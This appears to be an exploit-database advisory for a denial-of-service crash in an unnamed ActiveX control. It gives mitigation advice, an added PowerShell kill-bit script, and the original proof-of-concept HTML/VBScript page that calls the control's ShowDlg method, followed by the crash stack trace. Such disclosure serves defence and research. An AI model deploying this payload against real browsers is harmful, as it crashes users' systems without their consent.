Vendor: Not mentioned
By: Not mentioned
CVSS: 5.5 (MEDIUM)
Denial of Service (DoS)
CWE: Not mentioned
Product Name: Not mentioned
Affected Version From: Not mentioned
Affected Version To: Not mentioned
Patch Exists: No
Related CWE: Not mentioned
CPE: Not mentioned
Metasploit:
Other Scripts:
Platforms Tested: Not mentioned

Test DoS Page Vulnerability

This is a denial-of-service (DoS) vulnerability in an ActiveX control. A flaw in the target object's ShowDlg function can be triggered by passing a specially crafted argument, which causes a read from memory address 0x00000020 and an access violation exception (0xC0000005) in the target system.

Mitigation:

To mitigate this vulnerability, it is recommended to apply patches or updates provided by the vendor. Additionally, input validation and sanitization techniques can be implemented to prevent the exploitation of this vulnerability.
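
Because the listing shows no patch, one interim mitigation is to set the Internet Explorer kill bit for the control's CLSID so the browser refuses to instantiate it. The script below is an added example, not part of the original advisory or exploit; the CLSID is taken from the test page's object tag, and the function name Set-ActiveXKillBit is illustrative.

```powershell
# Added example: set the IE kill bit for the control's CLSID.
# Run from an elevated PowerShell prompt.

$Clsid   = '{CDF8A044-74AF-4045-AE13-D8AEDF802538}'  # classid from the <object> tag in the test page
$KillBit = 0x400                                      # kill-bit value in "Compatibility Flags"
$Name    = 'Compatibility Flags'

# Native registry view plus the 32-bit view used by 32-bit IE on 64-bit Windows.
$Roots = @(
    'HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility',
    'HKLM:\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility'
)

function Set-ActiveXKillBit {
    param([Parameter(Mandatory)][string]$Clsid)

    foreach ($root in $Roots) {
        # Skip views that do not exist (no Wow6432Node on 32-bit Windows).
        if (-not (Test-Path -Path $root)) { continue }

        $key = Join-Path -Path $root -ChildPath $Clsid
        if (-not (Test-Path -Path $key)) {
            New-Item -Path $key -Force | Out-Null
        }

        # Preserve any flags already present and OR in the kill bit.
        $prop   = Get-ItemProperty -Path $key -Name $Name -ErrorAction SilentlyContinue
        $before = if ($prop) { [int]$prop.$Name } else { 0 }
        $after  = $before -bor $KillBit
        Set-ItemProperty -Path $key -Name $Name -Value $after -Type DWord

        # Report what changed in each registry view.
        [pscustomobject]@{
            Key    = $key
            Before = '0x{0:X8}' -f $before
            After  = '0x{0:X8}' -f $after
        }
    }
}

Set-ActiveXKillBit -Clsid $Clsid | Format-Table -AutoSize
```

Restart Internet Explorer after running it. The kill bit only affects hosts that honor it, such as Internet Explorer; it does not fix the control itself.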
Source

Exploit-DB raw data:

################################################################ 
#       .___             __          _______       .___        # 
#     __| _/____ _______|  | __ ____ \   _  \    __| _/____    # 
#    / __ |\__  \\_  __ \  |/ // ___\/  /_\  \  / __ |/ __ \   # 
#   / /_/ | / __ \|  | \/    <\  \___\  \_/   \/ /_/ \  ___/   # 
#   \____ |(______/__|  |__|_ \\_____>\_____  /\_____|\____\   # 
#        \/                  \/             \/                 # 
#                   ___________   ______  _  __                # 
#                 _/ ___\_  __ \_/ __ \ \/ \/ /                # 
#                 \  \___|  | \/\  ___/\     /                 # 
#                  \___  >__|    \___  >\/\_/                  # 
#      est.2007        \/            \/   forum.darkc0de.com   # 
################################################################ 
# Greetz to all Darkc0de, AI, AH, ICW Members
# Shoutz to r45c4l, j4ckh4x0r, silic0n, smith, baltazar, d3hydr8, FB1H2S, lowlz, Eberly, Sumit, zerocode, dalsim, 7, Anirban, Anas, Navneet, Varun, Dilip, Manish
# Special Thanks to r45c4l for allowing analysis on his product

#RegKey Safe for Script: False
#RegKey Safe for Init: False

#Implements IObjectSafety: True 

<html>
Test DoS Page
<object classid='clsid:CDF8A044-74AF-4045-AE13-D8AEDF802538' id='target' ></object>
<script language='vbscript'>
arg1=String(1, "A")
target.ShowDlg arg1 
</script>
</html>

Access violation exception (0xC0000005) when trying to read from memory location 0x00000020 in the thread below.

Function                                        Arg 1     Arg 2     Arg 3     Source
TargetControl+145d0                             0000000f  00000000  00000000
mfc80u!CWnd::WindowProc+22                      0000000f  00000000  00000000
mfc80u!AfxCallWndProc+a3                        00000000  003008d0  0000000f
mfc80u!AfxWndProc+35                            003008d0  0000000f  00000000
TargetControl!DllGetClassObject+c1a2            003008d0  0000000f  00000000
user32!InternalCallWinProc+28                   05987d5f  003008d0  0000000f
user32!UserCallWinProcCheckWow+150              03c6a110  05987d5f  003008d0
user32!DispatchClientMessage+a3                 0068d978  0000000f  00000000
user32!__fnDWORD+24                             0013debc  00000018  0068d978
ntdll!KiUserCallbackDispatcher+13               7e42aedc  003e08f6  0000005e
user32!NtUserCallHwndLock+c                     003e08f6  0694e16c  0013df74
mfc80u!CWnd::RunModalLoop+77                    00000004  4aba760d  00000000
mfc80u!CDialog::DoModal+129                     4ab791a2  05540874  00000000
TargetControl+ef9f                              0694db40  0000001c  00000004
oleaut32!CTypeInfo2::Invoke+234                 03c7491c  0694db40  00000000
TargetControl+11c58                             0694db40  00000001  00000409
mshtml!COleSite::ContextInvokeEx+149            0414b6f0  00000001  00000409
mshtml!COleSite::ContextThunk_InvokeEx+44       0414b6f0  00000001  00000409
vbscript!IDispatchExInvokeEx2+a9                0003b8d8  0414ce50  00000001
vbscript!IDispatchExInvokeEx+56                 0003b8d8  0414ce50  00000001
vbscript!InvokeDispatch+101                     0003b8d8  0003b990  00000001
vbscript!InvokeByName+42                        0003b8d8  0414ce50  00000001
vbscript!CScriptRuntime::RunNoEH+234c           0013e6a4  4aab5064  00000000
vbscript!CScriptRuntime::Run+62                 0013e6a4  0003fd08  0003b8d8
vbscript!CScriptEntryPoint::Call+51             0013e6a4  00000000  00000000
vbscript!CSession::Execute+c8                   0003fd08  0013e888  00000000
vbscript!COleScript::ExecutePendingScripts+144  0013e888  0013e868  0003e454
vbscript!COleScript::ParseScriptTextCore+243    0414cd54  0414a394  00000000
vbscript!COleScript::ParseScriptText+2b         0003e454  0414cd54  0414a394
mshtml!CScriptCollection::ParseScriptText+1da   0414ca90  73301e34  00000000
mshtml!CScriptElement::CommitCode+1e1           00000000  00000000  00000000
mshtml!CScriptElement::Execute+a4               0414a520  06194d97  00000000
mshtml!CHtmParse::Execute+41                    0414a5e0  0414a520  7dcc4b65
mshtml!CHtmPost::Broadcast+d                    7dcc4b83  06194d97  0414a520
mshtml!CHtmPost::Exec+32b                       06194d97  0414a520  04140810
mshtml!CHtmPost::Run+12                         06194d97  04140810  06194ccf
mshtml!PostManExecute+51                        04140810  06194d97  0414a520
mshtml!PostManOnTimer+76                        00250938  00000113  00001003
user32!InternalCallWinProc+28                   7dcfb9d8  00250938  00000113
user32!UserCallWinProc+f3                       00000000  7dcfb9d8  00250938
user32!DispatchMessageWorker+10e                0013eb90  00000000  0013eb78
user32!DispatchMessageW+f                       0013eb90  00000000  00163468
browseui!TimedDispatchMessage+33                0013eb90  0013ee98  00000000
browseui!BrowserThreadProc+336                  00162ca8  0013ee98  00162ca8
browseui!BrowserProtectedThreadProc+50          00162ca8  00162ca8  00000000
browseui!SHOpenFolderWindow+22c                 00162ca8  00000000  00000000
shdocvw!IEWinMain+133                           001523ba  00000001  0140d0b8
iexplore!WinMainT+2de                           00400000  00000000  001523ba
iexplore!_ModuleEntry+99                        0140d0b8  00000018  7ffdf000
kernel32!BaseProcessStart+23                    00402451  00000000  78746341